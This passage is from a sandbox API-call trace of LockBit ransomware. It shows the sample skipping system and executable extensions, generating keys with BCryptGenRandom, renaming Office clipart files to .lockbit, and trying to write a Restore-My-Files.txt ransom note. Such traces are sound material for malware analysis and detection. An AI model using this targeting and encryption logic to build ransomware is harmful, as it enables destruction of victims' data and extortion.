lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.352] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.352] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF.lockbit") returned 72 [0155.352] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292278.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0155.364] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.364] malloc (_Size=0x40068) returned 0x3df0008 [0155.364] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13912) returned 1 [0155.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.364] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0155.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.364] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0155.365] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.370] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.370] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.370] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.371] free (_Block=0x1fa2ed8) [0155.371] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.371] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.371] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.371] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292286.WMF", cAlternateFileName="")) returned 1 [0155.371] lstrcmpiW (lpString1=".", lpString2="J0292286.WMF") returned -1 [0155.371] lstrcmpiW (lpString1="..", lpString2="J0292286.WMF") returned -1 [0155.371] PathFindExtensionW (pszPath="J0292286.WMF") returned=".WMF" [0155.371] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.372] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.373] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292286.WMF") returned 1 [0155.373] lstrcmpiW (lpString1="ntldr", lpString2="J0292286.WMF") returned 1 [0155.373] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292286.WMF") returned 1 [0155.373] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292286.WMF") returned -1 [0155.373] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292286.WMF") returned -1 [0155.373] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292286.WMF") returned 1 [0155.373] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292286.WMF") returned -1 [0155.373] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.373] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF") returned=".WMF" [0155.373] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.373] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.374] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.374] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.374] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF.lockbit") returned 72 [0155.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292286.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0155.375] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.375] malloc (_Size=0x40068) returned 0x1ff1e60 [0155.375] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19286) returned 1 [0155.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0155.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0155.376] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.388] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.388] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.389] free (_Block=0x1fa2ed8) [0155.389] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.389] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.389] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.389] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293800.WMF", cAlternateFileName="")) returned 1 [0155.389] lstrcmpiW (lpString1=".", lpString2="J0293800.WMF") returned -1 [0155.389] lstrcmpiW (lpString1="..", lpString2="J0293800.WMF") returned -1 [0155.390] PathFindExtensionW (pszPath="J0293800.WMF") returned=".WMF" [0155.390] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.390] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.391] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.391] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293800.WMF") returned 1 [0155.391] lstrcmpiW (lpString1="ntldr", lpString2="J0293800.WMF") returned 1 [0155.391] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293800.WMF") returned 1 [0155.391] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293800.WMF") returned -1 [0155.391] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293800.WMF") returned -1 [0155.391] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293800.WMF") returned 1 [0155.391] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293800.WMF") returned -1 [0155.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.392] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF") returned=".WMF" [0155.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.392] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.392] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.393] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.393] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF.lockbit") returned 72 [0155.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0293800.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0155.393] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.393] malloc (_Size=0x40068) returned 0x3d70450 [0155.394] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4774) returned 1 [0155.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0155.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0155.395] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0155.401] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.401] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.401] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.408] free (_Block=0x1fa2ed8) [0155.408] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.408] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.408] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293832.WMF", cAlternateFileName="")) returned 1 [0155.409] lstrcmpiW (lpString1=".", lpString2="J0293832.WMF") returned -1 [0155.409] lstrcmpiW (lpString1="..", lpString2="J0293832.WMF") returned -1 [0155.409] PathFindExtensionW (pszPath="J0293832.WMF") returned=".WMF" [0155.409] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.409] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") 